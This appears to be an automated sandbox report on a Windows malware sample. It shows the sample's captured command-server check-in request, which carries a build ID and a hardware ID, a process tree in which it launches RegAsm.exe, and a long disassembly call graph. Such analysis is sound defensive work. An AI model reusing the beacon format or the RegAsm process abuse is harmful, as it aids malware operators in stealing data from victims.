      2024-07-01 07:24:01 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d 26 68 77 69 64 3d 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33
      Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--default2806&j=&hwid=C47BA87E7FEA4409D64FF88069D88493
      2024-07-01 07:24:01 UTC804INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:24:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=336n36mcqla5aah90tdb5kp0ic; expires=Fri, 25-Oct-2024 01:10:40 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QStBm2hq40Cqm8HLDCvfJNwly4s1G4l7mu3xyYV9gGdr5NQbQX%2FNRWxXK7AW84WWNfTq3i9Ar6XrjGtvvApEuHULHx4eArPU1j%2FqXp85i1yXUEPtZoKhit%2BbONlUuVoCJGuraA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a76bbb36c44f-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:24:01 UTC54INData Raw: 33 30 0d 0a 64 54 69 61 6d 56 6a 2f 49 57 43 43 47 49 39 42 78 63 67 58 4d 67 4e 4a 65 7a 75 4c 79 38 35 59 51 67 63 38 2b 6b 50 39 68 57 51 75 5a 51 3d 3d 0d 0a
      Data Ascii: 30dTiamVj/IWCCGI9BxcgXMgNJezuLy85YQgc8+kP9hWQuZQ==
      2024-07-01 07:24:01 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:03:23:32
      Start date:01/07/2024
      Path:C:\Users\user\Desktop\mkFOY01Gl5.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\mkFOY01Gl5.exe"
      Imagebase:0xf0000
      File size:528'384 bytes
      MD5 hash:0309DD0131150796EA99B30A62194FAE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      General

      Target ID:1
      Start time:03:23:32
      Start date:01/07/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:3
      Start time:03:23:33
      Start date:01/07/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x340000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:4
      Start time:03:23:33
      Start date:01/07/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x570000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:7
      Start time:03:23:33
      Start date:01/07/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304
      Imagebase:0x1000000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:11
      Start time:03:24:01
      Start date:01/07/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 1796
      Imagebase:0x1000000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Disassembly

      Reset < >

        Execution Graph

        Execution Coverage:4.1%
        Dynamic/Decrypted Code Coverage:0.4%
        Signature Coverage:1.6%
        Total number of Nodes:1970
        Total number of Limit Nodes:58
        execution_graph 19838 f6615 19839 f6621 __EH_prolog3_GS 19838->19839 19842 f666e 19839->19842 19843 f6687 19839->19843 19846 f6638 19839->19846 19840 f76c1 std::_Throw_Cpp_error 5 API calls 19841 f67a2 19840->19841 19854 f5983 19842->19854 19857 ffa9d 19843->19857 19846->19840 19848 f2a10 std::_Throw_Cpp_error 41 API calls 19848->19846 19849 f6746 19849->19848 19850 f66a6 19850->19849 19852 ffa9d 43 API calls 19850->19852 19853 f675f 19850->19853 19877 f4ac0 19850->19877 19852->19850 19853->19849 19888 1009fc 19853->19888 19855 ffa9d 43 API calls 19854->19855 19856 f598e 19855->19856 19856->19846 19858 ffaa9 __FrameHandler3::FrameUnwindToState 19857->19858 19859 ffacb 19858->19859 19860 ffab3 19858->19860 19901 ff57b EnterCriticalSection 19859->19901 19861 ff3fe __dosmaperr 14 API calls 19860->19861 19864 ffab8 19861->19864 19863 ffad5 19865 ffb71 19863->19865 19867 105f6b _Fputc 41 API calls 19863->19867 19866 fbbff __strnicoll 41 API calls 19864->19866 19902 ffa61 19865->19902 19869 ffac3 _Fputc 19866->19869 19872 ffaf2 19867->19872 19869->19850 19870 ffb77 19909 ffba1 19870->19909 19872->19865 19873 ffb49 19872->19873 19874 ff3fe __dosmaperr 14 API calls 19873->19874 19875 ffb4e 19874->19875 19876 fbbff __strnicoll 41 API calls 19875->19876 19876->19869 19878 f4af4 19877->19878 19879 f4ad2 19877->19879 19880 f4bcf 19878->19880 19881 f4b06 19878->19881 19879->19850 19882 f36f0 std::_Throw_Cpp_error 43 API calls 19880->19882 19884 f13f0 std::_Throw_Cpp_error 43 API calls 19881->19884 19886 f4b3e _Yarn 19882->19886 19883 fbc0f std::_Throw_Cpp_error 41 API calls 19885 f4bd9 19883->19885 19884->19886 19886->19883 19887 f4b8f _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19886->19887 19887->19850 19889 100a08 __FrameHandler3::FrameUnwindToState 19888->19889 19890 100a24 19889->19890 19891 100a0f 19889->19891 19913 ff57b EnterCriticalSection 19890->19913 19892 ff3fe __dosmaperr 14 API calls 19891->19892 19894 100a14 19892->19894 19896 fbbff __strnicoll 41 API calls 19894->19896 19895 100a2e 19914 100903 19895->19914 19899 100a1f 19896->19899 19899->19853 19901->19863 19903 ffa6d 19902->19903 19906 ffa82 __fread_nolock 19902->19906 19904 ff3fe __dosmaperr 14 API calls 19903->19904 19905 ffa72 19904->19905 19907 fbbff __strnicoll 41 API calls 19905->19907 19906->19870 19908 ffa7d 19907->19908 19908->19870 19912 ff58f LeaveCriticalSection 19909->19912 19911 ffba7 19911->19869 19912->19911 19913->19895 19915 10091b 19914->19915 19917 10098b 19914->19917 19916 105f6b _Fputc 41 API calls 19915->19916 19921 100921 19916->19921 19918 10a269 14 API calls 19917->19918 19919 100983 19917->19919 19918->19919 19925 100a67 19919->19925 19920 100973 19922 ff3fe __dosmaperr 14 API calls 19920->19922 19921->19917 19921->19920 19923 100978 19922->19923 19924 fbbff __strnicoll 41 API calls 19923->19924 19924->19919 19928 ff58f LeaveCriticalSection 19925->19928 19927 100a6d 19927->19899 19928->19927 18146 109433 18147 105f6b _Fputc 41 API calls 18146->18147 18149 109440 18147->18149 18148 10944c 18149->18148 18150 109498 18149->18150 18169 1095fb 18149->18169 18150->18148 18152 1094fa 18150->18152 18153 105fa7 41 API calls 18150->18153 18158 109529 18152->18158 18155 1094ed 18153->18155 18155->18152 18177 10a269 18155->18177 18159 105f6b _Fputc 41 API calls 18158->18159 18160 109538 18159->18160 18161 10954b 18160->18161 18162 1095de 18160->18162 18164 109568 18161->18164 18167 10958f 18161->18167 18163 108965 ___scrt_uninitialize_crt 66 API calls 18162->18163 18166 10950b 18163->18166 18165 108965 ___scrt_uninitialize_crt 66 API calls 18164->18165 18165->18166 18167->18166 18182 10a1ad 18167->18182 18170 109611 18169->18170 18171 109615 18169->18171 18170->18150 18172 10bdb6 __fread_nolock 41 API calls 18171->18172 18176 109664 18171->18176 18173 109636 18172->18173 18174 10963e SetFilePointerEx 18173->18174 18173->18176 18175 109655 GetFileSizeEx 18174->18175 18174->18176 18175->18176 18176->18150 18178 104eaf __dosmaperr 14 API calls 18177->18178 18179 10a286 18178->18179 18180 104f0c ___free_lconv_mon 14 API calls 18179->18180 18181 10a290 18180->18181 18181->18152 18183 10a1c1 _Fputc 18182->18183 18188 10a004 18183->18188 18186 fb93b _Fputc 41 API calls 18187 10a1e5 18186->18187 18187->18166 18189 10a010 __FrameHandler3::FrameUnwindToState 18188->18189 18190 10a0ee 18189->18190 18192 10a018 18189->18192 18193 10a06c 18189->18193 18191 fbb82 _Fputc 41 API calls 18190->18191 18191->18192 18192->18186 18199 10bcdf EnterCriticalSection 18193->18199 18195 10a072 18196 10a097 18195->18196 18197 10a12a __fread_nolock 43 API calls 18195->18197 18200 10a0e6 18196->18200 18197->18196 18199->18195 18203 10bd02 LeaveCriticalSection 18200->18203 18202 10a0ec 18202->18192 18203->18202 20092 f682a 20094 f683c _Yarn 20092->20094 20093 f6842 20094->20093 20095 f68ec 20094->20095 20098 fff78 20094->20098 20095->20093 20097 fff78 __fread_nolock 55 API calls 20095->20097 20097->20093 20101 fff95 20098->20101 20102 fffa1 __FrameHandler3::FrameUnwindToState 20101->20102 20103 fffeb 20102->20103 20104 fffb4 __fread_nolock 20102->20104 20113 fff90 20102->20113 20114 ff57b EnterCriticalSection 20103->20114 20106 ff3fe __dosmaperr 14 API calls 20104->20106 20108 fffce 20106->20108 20107 ffff5 20115 ffd92 20107->20115 20110 fbbff __strnicoll 41 API calls 20108->20110 20110->20113 20113->20094 20114->20107 20117 ffda3 __fread_nolock 20115->20117 20127 ffdbf 20115->20127 20116 ffdaf 20118 ff3fe __dosmaperr 14 API calls 20116->20118 20117->20116 20121 ffe01 __fread_nolock 20117->20121 20117->20127 20119 ffdb4 20118->20119 20120 fbbff __strnicoll 41 API calls 20119->20120 20120->20127 20122 fff28 __fread_nolock 20121->20122 20123 105f6b _Fputc 41 API calls 20121->20123 20124 100032 __fread_nolock 41 API calls 20121->20124 20121->20127 20131 109c65 20121->20131 20125 ff3fe __dosmaperr 14 API calls 20122->20125 20123->20121 20124->20121 20125->20119 20128 10002a 20127->20128 20225 ff58f LeaveCriticalSection 20128->20225 20130 100030 20130->20113 20132 109c77 20131->20132 20133 109c8f 20131->20133 20135 ff3eb __dosmaperr 14 API calls 20132->20135 20134 109fe5 20133->20134 20142 109cd5 20133->20142 20137 ff3eb __dosmaperr 14 API calls 20134->20137 20136 109c7c 20135->20136 20138 ff3fe __dosmaperr 14 API calls 20136->20138 20139 109fea 20137->20139 20143 109c84 20138->20143 20140 ff3fe __dosmaperr 14 API calls 20139->20140 20144 109ced 20140->20144 20141 109ce0 20145 ff3eb __dosmaperr 14 API calls 20141->20145 20142->20141 20142->20143 20149 109d10 20142->20149 20143->20121 20147 fbbff __strnicoll 41 API calls 20144->20147 20146 109ce5 20145->20146 20148 ff3fe __dosmaperr 14 API calls 20146->20148 20147->20143 20148->20144 20150 109d29 20149->20150 20151 109d43 20149->20151 20152 109d74 20149->20152 20150->20151 20156 109d2e 20150->20156 20153 ff3eb __dosmaperr 14 API calls 20151->20153 20155 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 20152->20155 20154 109d48 20153->20154 20158 ff3fe __dosmaperr 14 API calls 20154->20158 20157 109d85 20155->20157 20159 110028 __fread_nolock 41 API calls 20156->20159 20160 104f0c ___free_lconv_mon 14 API calls 20157->20160 20161 109d4f 20158->20161 20162 109ec1 20159->20162 20163 109d8e 20160->20163 20164 fbbff __strnicoll 41 API calls 20161->20164 20165 109f35 20162->20165 20168 109eda GetConsoleMode 20162->20168 20166 104f0c ___free_lconv_mon 14 API calls 20163->20166 20193 109d5a __fread_nolock 20164->20193 20167 109f39 ReadFile 20165->20167 20169 109d95 20166->20169 20170 109f51 20167->20170 20171 109fad GetLastError 20167->20171 20168->20165 20172 109eeb 20168->20172 20173 109dba 20169->20173 20174 109d9f 20169->20174 20170->20171 20177 109f2a 20170->20177 20175 109f11 20171->20175 20176 109fba 20171->20176 20172->20167 20178 109ef1 ReadConsoleW 20172->20178 20194 10a20b 20173->20194 20180 ff3fe __dosmaperr 14 API calls 20174->20180 20184 ff3a4 __dosmaperr 14 API calls 20175->20184 20175->20193 20182 ff3fe __dosmaperr 14 API calls 20176->20182 20189 109f76 20177->20189 20190 109f8d 20177->20190 20177->20193 20178->20177 20183 109f0b GetLastError 20178->20183 20179 104f0c ___free_lconv_mon 14 API calls 20179->20143 20185 109da4 20180->20185 20186 109fbf 20182->20186 20183->20175 20184->20193 20187 ff3eb __dosmaperr 14 API calls 20185->20187 20188 ff3eb __dosmaperr 14 API calls 20186->20188 20187->20193 20188->20193 20200 10997f 20189->20200 20190->20193 20213 1097d7 20190->20213 20193->20179 20195 10a21f _Fputc 20194->20195 20196 10a12a __fread_nolock 43 API calls 20195->20196 20197 10a234 20196->20197 20198 fb93b _Fputc 41 API calls 20197->20198 20199 10a243 20198->20199 20199->20156 20219 10968b 20200->20219 20202 10a33b __strnicoll MultiByteToWideChar 20204 109a93 20202->20204 20207 109a9c GetLastError 20204->20207 20208 1099c7 20204->20208 20205 109a21 20211 10a20b __fread_nolock 43 API calls 20205->20211 20212 1099db 20205->20212 20206 109a11 20209 ff3fe __dosmaperr 14 API calls 20206->20209 20210 ff3a4 __dosmaperr 14 API calls 20207->20210 20208->20193 20209->20208 20210->20208 20211->20212 20212->20202 20214 10980e 20213->20214 20215 10989e 20214->20215 20216 1098a3 ReadFile 20214->20216 20215->20193 20216->20215 20217 1098c0 20216->20217 20217->20215 20218 10a20b __fread_nolock 43 API calls 20217->20218 20218->20215 20220 1096bf 20219->20220 20221 10972e ReadFile 20220->20221 20222 109729 20220->20222 20221->20222 20223 109747 20221->20223 20222->20205 20222->20206 20222->20208 20222->20212 20223->20222 20224 10a20b __fread_nolock 43 API calls 20223->20224 20224->20222 20225->20130 17523 f625d 17525 f6279 17523->17525 17527 f6280 17523->17527 17541 f71da 17525->17541 17526 f6363 17527->17525 17529 f6326 17527->17529 17531 f62c9 17527->17531 17529->17525 17535 1006cb 17529->17535 17531->17525 17532 f59a3 17531->17532 17548 ffd5e 17532->17548 17536 1006de _Fputc 17535->17536 17936 1004aa 17536->17936 17538 1006f3 17539 fb93b _Fputc 41 API calls 17538->17539 17540 100700 17539->17540 17540->17525 17542 f71e3 IsProcessorFeaturePresent 17541->17542 17543 f71e2 17541->17543 17545 f7a03 17542->17545 17543->17526 18145 f79c6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17545->18145 17547 f7ae6 17547->17526 17549 ffd71 _Fputc 17548->17549 17554 ffc04 17549->17554 17551 ffd80 17568 fb93b 17551->17568 17555 ffc10 __FrameHandler3::FrameUnwindToState 17554->17555 17556 ffc3d 17555->17556 17557 ffc19 17555->17557 17574 ff57b EnterCriticalSection 17556->17574 17575 fbb82 17557->17575 17560 ffc46 17561 ffcf1 _Fputc 17560->17561 17586 105f6b 17560->17586 17593 ffd29 17561->17593 17564 ffc5f 17564->17561 17565 ffcc0 17564->17565 17566 fbb82 _Fputc 41 API calls 17565->17566 17567 ffc32 _Fputc 17566->17567 17567->17551 17569 fb947 17568->17569 17570 fb95e 17569->17570 17785 fb9e6 17569->17785 17571 f59b3 17570->17571 17573 fb9e6 _Fputc 41 API calls 17570->17573 17571->17525 17573->17571 17574->17560 17576 fbb99 17575->17576 17577 fbb92 17575->17577 17578 fbba7 17576->17578 17600 fb977 17576->17600 17596 fb9a0 GetLastError 17577->17596 17578->17567 17581 fbbce 17581->17578 17603 fbc2c IsProcessorFeaturePresent 17581->17603 17583 fbbfe 17607 fbb4b 17583->17607 17587 105f77 17586->17587 17588 105f8c 17586->17588 17589 ff3fe __dosmaperr 14 API calls 17587->17589 17588->17564 17590 105f7c 17589->17590 17781 fbbff 17590->17781 17784 ff58f LeaveCriticalSection 17593->17784 17595 ffd2f 17595->17567 17597 fb9b9 17596->17597 17613 1043e2 17597->17613 17601 fb99b 17600->17601 17602 fb982 GetLastError SetLastError 17600->17602 17601->17581 17602->17581 17604 fbc38 17603->17604 17775 fba03 17604->17775 17608 fbb5d _Fputc 17607->17608 17609 fbb82 _Fputc 41 API calls 17608->17609 17610 fbb75 17609->17610 17611 fb93b _Fputc 41 API calls 17610->17611 17612 fbb80 17611->17612 17612->17567 17614 1043f5 17613->17614 17615 1043fb 17613->17615 17635 1067b0 17614->17635 17634 fb9d1 SetLastError 17615->17634 17640 1067ef 17615->17640 17621 104442 17624 1067ef __dosmaperr 6 API calls 17621->17624 17622 10442d 17623 1067ef __dosmaperr 6 API calls 17622->17623 17625 104439 17623->17625 17626 10444e 17624->17626 17654 104f0c 17625->17654 17627 104461 17626->17627 17628 104452 17626->17628 17660 10400e 17627->17660 17631 1067ef __dosmaperr 6 API calls 17628->17631 17631->17625 17633 104f0c ___free_lconv_mon 14 API calls 17633->17634 17634->17576 17665 10655f 17635->17665 17638 1067d5 17638->17615 17639 1067e7 TlsGetValue 17641 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 17640->17641 17642 10680b 17641->17642 17643 104415 17642->17643 17644 106829 TlsSetValue 17642->17644 17643->17634 17645 104eaf 17643->17645 17646 104ebc 17645->17646 17647 104efc 17646->17647 17648 104ee7 HeapAlloc 17646->17648 17652 104ed0 __dosmaperr 17646->17652 17683 ff3fe 17647->17683 17649 104efa 17648->17649 17648->17652 17651 104425 17649->17651 17651->17621 17651->17622 17652->17647 17652->17648 17680 1014ed 17652->17680 17655 104f41 17654->17655 17656 104f17 RtlFreeHeap 17654->17656 17655->17634 17656->17655 17657 104f2c GetLastError 17656->17657 17658 104f39 __dosmaperr 17657->17658 17659 ff3fe __dosmaperr 12 API calls 17658->17659 17659->17655 17719 103ea2 17660->17719 17666 10658d 17665->17666 17671 106589 17665->17671 17666->17671 17672 106494 17666->17672 17669 1065a7 GetProcAddress 17670 1065b7 std::_Locinfo::_Locinfo_ctor 17669->17670 17669->17671 17670->17671 17671->17638 17671->17639 17678 1064a5 ___vcrt_InitializeCriticalSectionEx 17672->17678 17673 10653b 17673->17669 17673->17671 17674 1064c3 LoadLibraryExW 17675 106542 17674->17675 17676 1064de GetLastError 17674->17676 17675->17673 17677 106554 FreeLibrary 17675->17677 17676->17678 17677->17673 17678->17673 17678->17674 17679 106511 LoadLibraryExW 17678->17679 17679->17675 17679->17678 17686 10151a 17680->17686 17696 104331 GetLastError 17683->17696 17685 ff403 17685->17651 17687 101526 __FrameHandler3::FrameUnwindToState 17686->17687 17692 fe9a9 EnterCriticalSection 17687->17692 17689 101531 17693 10156d 17689->17693 17692->17689 17694 fe9f1 std::_Lockit::~_Lockit LeaveCriticalSection 17693->17694 17695 1014f8 17694->17695 17695->17652 17697 10434d 17696->17697 17698 104347 17696->17698 17699 1067ef __dosmaperr 6 API calls 17697->17699 17702 104351 SetLastError 17697->17702 17700 1067b0 __dosmaperr 6 API calls 17698->17700 17701 104369 17699->17701 17700->17697 17701->17702 17704 104eaf __dosmaperr 12 API calls 17701->17704 17702->17685 17705 10437e 17704->17705 17706 104386 17705->17706 17707 104397 17705->17707 17708 1067ef __dosmaperr 6 API calls 17706->17708 17709 1067ef __dosmaperr 6 API calls 17707->17709 17710 104394 17708->17710 17711 1043a3 17709->17711 17715 104f0c ___free_lconv_mon 12 API calls 17710->17715 17712 1043a7 17711->17712 17713 1043be 17711->17713 17714 1067ef __dosmaperr 6 API calls 17712->17714 17716 10400e __dosmaperr 12 API calls 17713->17716 17714->17710 17715->17702 17717 1043c9 17716->17717 17718 104f0c ___free_lconv_mon 12 API calls 17717->17718 17718->17702 17720 103eae __FrameHandler3::FrameUnwindToState 17719->17720 17733 fe9a9 EnterCriticalSection 17720->17733 17722 103eb8 17734 103ee8 17722->17734 17725 103fb4 17726 103fc0 __FrameHandler3::FrameUnwindToState 17725->17726 17738 fe9a9 EnterCriticalSection 17726->17738 17728 103fca 17739 104195 17728->17739 17730 103fe2 17743 104002 17730->17743 17733->17722 17737 fe9f1 LeaveCriticalSection 17734->17737 17736 103ed6 17736->17725 17737->17736 17738->17728 17740 1041cb __Getctype 17739->17740 17741 1041a4 __Getctype 17739->17741 17740->17730 17741->17740 17746 10cb80 17741->17746 17774 fe9f1 LeaveCriticalSection 17743->17774 17745 103ff0 17745->17633 17747 10cc00 17746->17747 17750 10cb96 17746->17750 17748 10cc4e 17747->17748 17751 104f0c ___free_lconv_mon 14 API calls 17747->17751 17749 10ccf1 __Getctype 14 API calls 17748->17749 17756 10cc5c 17749->17756 17750->17747 17752 10cbc9 17750->17752 17758 104f0c ___free_lconv_mon 14 API calls 17750->17758 17753 10cc22 17751->17753 17754 10cbeb 17752->17754 17760 104f0c ___free_lconv_mon 14 API calls 17752->17760 17755 104f0c ___free_lconv_mon 14 API calls 17753->17755 17757 104f0c ___free_lconv_mon 14 API calls 17754->17757 17759 10cc35 17755->17759 17763 10ccbc 17756->17763 17773 104f0c 14 API calls ___free_lconv_mon 17756->17773 17762 10cbf5 17757->17762 17764 10cbbe 17758->17764 17761 104f0c ___free_lconv_mon 14 API calls 17759->17761 17765 10cbe0 17760->17765 17766 10cc43 17761->17766 17767 104f0c ___free_lconv_mon 14 API calls 17762->17767 17768 104f0c ___free_lconv_mon 14 API calls 17763->17768 17769 10be36 ___free_lconv_mon 14 API calls 17764->17769 17770 10c2ea __Getctype 14 API calls 17765->17770 17771 104f0c ___free_lconv_mon 14 API calls 17766->17771 17767->17747 17772 10ccc2 17768->17772 17769->17752 17770->17754 17771->17748 17772->17740 17773->17756 17774->17745 17776 fba1f __fread_nolock std::locale::_Setgloballocale 17775->17776 17777 fba4b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17776->17777 17778 fbb1c std::locale::_Setgloballocale 17777->17778 17779 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17778->17779 17780 fbb3a GetCurrentProcess TerminateProcess 17779->17780 17780->17583 17782 fbb4b __strnicoll 41 API calls 17781->17782 17783 fbc0b 17782->17783 17783->17564 17784->17595 17786 fb9f9 17785->17786 17787 fb9f0 17785->17787 17786->17570 17788 fb9a0 _Fputc 16 API calls 17787->17788 17789 fb9f5 17788->17789 17789->17786 17792 fea1f 17789->17792 17803 106e80 17792->17803 17795 fea2f 17797 fea39 IsProcessorFeaturePresent 17795->17797 17802 fea58 17795->17802 17798 fea45 17797->17798 17800 fba03 std::locale::_Setgloballocale 8 API calls 17798->17800 17800->17802 17833 102095 17802->17833 17836 106db2 17803->17836 17806 106ec5 17807 106ed1 __FrameHandler3::FrameUnwindToState 17806->17807 17808 106ef8 std::locale::_Setgloballocale 17807->17808 17809 104331 __dosmaperr 14 API calls 17807->17809 17810 106efe std::locale::_Setgloballocale 17807->17810 17808->17810 17811 106f45 17808->17811 17822 106f2f 17808->17822 17809->17808 17815 106f71 17810->17815 17847 fe9a9 EnterCriticalSection 17810->17847 17812 ff3fe __dosmaperr 14 API calls 17811->17812 17813 106f4a 17812->17813 17814 fbbff __strnicoll 41 API calls 17813->17814 17814->17822 17818 106fb3 17815->17818 17819 1070a4 17815->17819 17830 106fe2 17815->17830 17818->17830 17848 1041e0 GetLastError 17818->17848 17821 1070af 17819->17821 17879 fe9f1 LeaveCriticalSection 17819->17879 17824 102095 std::locale::_Setgloballocale 23 API calls 17821->17824 17822->17795 17825 1070b7 17824->17825 17827 1041e0 __Getctype 41 API calls 17831 107037 17827->17831 17829 1041e0 __Getctype 41 API calls 17829->17830 17875 107051 17830->17875 17831->17822 17832 1041e0 __Getctype 41 API calls 17831->17832 17832->17822 17881 101eb9 17833->17881 17837 106dbe __FrameHandler3::FrameUnwindToState 17836->17837 17842 fe9a9 EnterCriticalSection 17837->17842 17839 106dcc 17843 106e0a 17839->17843 17842->17839 17846 fe9f1 LeaveCriticalSection 17843->17846 17845 fea24 17845->17795 17845->17806 17846->17845 17847->17815 17849 1041fc 17848->17849 17850 1041f6 17848->17850 17852 1067ef __dosmaperr 6 API calls 17849->17852 17872 104200 SetLastError 17849->17872 17851 1067b0 __dosmaperr 6 API calls 17850->17851 17851->17849 17853 104218 17852->17853 17855 104eaf __dosmaperr 14 API calls 17853->17855 17853->17872 17858 10422d 17855->17858 17856 104290 17856->17829 17857 104295 17859 fea1f __FrameHandler3::FrameUnwindToState 39 API calls 17857->17859 17860 104235 17858->17860 17861 104246 17858->17861 17864 10429a 17859->17864 17862 1067ef __dosmaperr 6 API calls 17860->17862 17863 1067ef __dosmaperr 6 API calls 17861->17863 17865 104243 17862->17865 17866 104252 17863->17866 17870 104f0c ___free_lconv_mon 14 API calls 17865->17870 17867 104256 17866->17867 17868 10426d 17866->17868 17869 1067ef __dosmaperr 6 API calls 17867->17869 17871 10400e __dosmaperr 14 API calls 17868->17871 17869->17865 17870->17872 17873 104278 17871->17873 17872->17856 17872->17857 17874 104f0c ___free_lconv_mon 14 API calls 17873->17874 17874->17872 17876 107057 17875->17876 17877 107028 17875->17877 17880 fe9f1 LeaveCriticalSection 17876->17880 17877->17822 17877->17827 17877->17831 17879->17821 17880->17877 17882 101ee6 17881->17882 17883 101ef7 17881->17883 17892 101f81 GetModuleHandleW 17882->17892 17899 101d81 17883->17899 17888 fea62 17893 101eeb 17892->17893 17893->17883 17894 101fe6 GetModuleHandleExW 17893->17894 17895 102025 GetProcAddress 17894->17895 17896 102039 17894->17896 17895->17896 17897 102055 17896->17897 17898 10204c FreeLibrary 17896->17898 17897->17883 17898->17897 17900 101d8d __FrameHandler3::FrameUnwindToState 17899->17900 17914 fe9a9 EnterCriticalSection 17900->17914 17902 101d97 17915 101dce 17902->17915 17904 101da4 17919 101dc2 17904->17919 17907 101f50 17927 101fc4 17907->17927 17910 101f6e 17912 101fe6 std::locale::_Setgloballocale 3 API calls 17910->17912 17911 101f5e GetCurrentProcess TerminateProcess 17911->17910 17913 101f76 ExitProcess 17912->17913 17914->17902 17916 101dda __FrameHandler3::FrameUnwindToState 17915->17916 17918 101e41 std::locale::_Setgloballocale 17916->17918 17922 103b53 17916->17922 17918->17904 17926 fe9f1 LeaveCriticalSection 17919->17926 17921 101db0 17921->17888 17921->17907 17923 103b5f __EH_prolog3 17922->17923 17924 1038ab std::locale::_Setgloballocale 14 API calls 17923->17924 17925 103b86 codecvt 17924->17925 17925->17918 17926->17921 17932 106b35 GetPEB 17927->17932 17930 101f5a 17930->17910 17930->17911 17931 101fce GetPEB 17931->17930 17933 101fc9 17932->17933 17934 106b4f 17932->17934 17933->17930 17933->17931 17935 1065e2 std::locale::_Setgloballocale 5 API calls 17934->17935 17935->17933 17937 1004e0 17936->17937 17938 1004b8 17936->17938 17937->17538 17938->17937 17939 1004c5 17938->17939 17940 1004e7 17938->17940 17941 fbb82 _Fputc 41 API calls 17939->17941 17944 100403 17940->17944 17941->17937 17945 10040f __FrameHandler3::FrameUnwindToState 17944->17945 17952 ff57b EnterCriticalSection 17945->17952 17947 10041d 17953 10045e 17947->17953 17952->17947 17963 105fe2 17953->17963 17960 100452 18144 ff58f LeaveCriticalSection 17960->18144 17962 10043b 17962->17538 17985 105fa7 17963->17985 17965 105ff3 17966 100476 17965->17966 17967 106043 17965->17967 17972 100521 17966->17972 17991 105136 17967->17991 17970 104f0c ___free_lconv_mon 14 API calls 17971 106056 17970->17971 17971->17966 17974 100533 17972->17974 17976 100494 17972->17976 17973 100541 17975 fbb82 _Fputc 41 API calls 17973->17975 17974->17973 17974->17976 17979 100577 _Yarn _Fputc 17974->17979 17975->17976 17981 10608e 17976->17981 17978 105f6b _Fputc 41 API calls 17978->17979 17979->17976 17979->17978 18007 ff935 17979->18007 18013 108965 17979->18013 17982 10042a 17981->17982 17983 106099 17981->17983 17982->17960 17983->17982 17984 ff935 ___scrt_uninitialize_crt 66 API calls 17983->17984 17984->17982 17987 105fb3 17985->17987 17986 105fd4 17986->17965 17987->17986 17988 105f6b _Fputc 41 API calls 17987->17988 17989 105fce 17988->17989 17998 110028 17989->17998 17992 105174 17991->17992 17993 105144 __dosmaperr 17991->17993 17995 ff3fe __dosmaperr 14 API calls 17992->17995 17993->17992 17994 10515f HeapAlloc 17993->17994 17997 1014ed std::_Facet_Register 2 API calls 17993->17997 17994->17993 17996 105172 17994->17996 17995->17996 17996->17970 17997->17993 17999 110042 17998->17999 18000 110035 